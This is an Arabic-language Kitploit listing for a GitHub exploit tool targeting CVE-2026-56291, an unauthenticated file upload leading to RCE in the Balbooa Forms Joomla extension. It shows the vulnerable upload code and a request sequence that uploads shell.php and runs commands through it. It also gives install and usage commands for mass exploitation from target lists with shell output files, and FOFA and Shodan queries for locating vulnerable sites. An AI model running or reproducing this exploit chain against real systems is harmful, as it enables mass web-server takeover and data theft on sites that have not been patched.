Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-56291 — Balbooa Forms (com_baforms) < 2.4.1 — رفع ملف بدون مصادقة إلى RCE عبر form.uploadAttachmentFile | CVSS 9.8 | CISA KEV | Kitploit
أدوات/GitHubGitHub/shinthink/cve-2026-56291
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubshinthink/cve-2026-56291

CVE-2026-56291

Balbooa Forms (com_baforms) < 2.4.1 — رفع ملف بدون مصادقة إلى RCE عبر form.uploadAttachmentFile | CVSS 9.8 | CISA KEV

عرض المستودع
2منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-56291 — استغلال Balbooa Forms في Joomla للتنفيذ الجماعي عن بُعد (Mass RCE)

قبل المصادقة: form.uploadAttachmentFile → بلا CSRF → رفع PHP


نظرة عامة

CVE-2026-56291 هي ثغرة حرجة (CVSS 9.8) تسمح برفع ملفات تعسفية دون مصادقة في امتداد Joomla الخاص بـ Balbooa Forms (com_baforms) (الإصدارات < 2.4.1).

لا تستدعي مهمة الواجهة الأمامية form.uploadAttachmentFile الدالة Session::checkToken() ولا تجري أي فحص للصلاحيات. تستخدم الملفات المرفوعة امتداد المهاجم مباشرة: $fileName = $name . '.' . $ext. تُخزَّن الملفات في images/baforms/uploads/form-{id}/ — وهي قابلة للتنفيذ المباشر كـ PHP.

الإصدارات المتأثرة

الإصدارالحالة
1.0 – 2.4.0متأثر
2.4.1+مصحّح

CISA KEV: أُضيف في 10 يوليو 2026 — تم تأكيد الاستغلال النشط.


آلية الثغرة

السبب الجذري

root@kitploit:~
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext;  // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);

خطوات الهجوم

root@kitploit:~
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE

التثبيت

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup

FOFA / Shodan

root@kitploit:~
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"

المراجع

المصدرالرابط
CISA KEVcisa.gov/known-exploited-vulnerabilities
تفاصيل الإصلاحmysites.guru
الباحثPhil Taylor

غير تابع لـ Balbooa.

تنزيل الأداة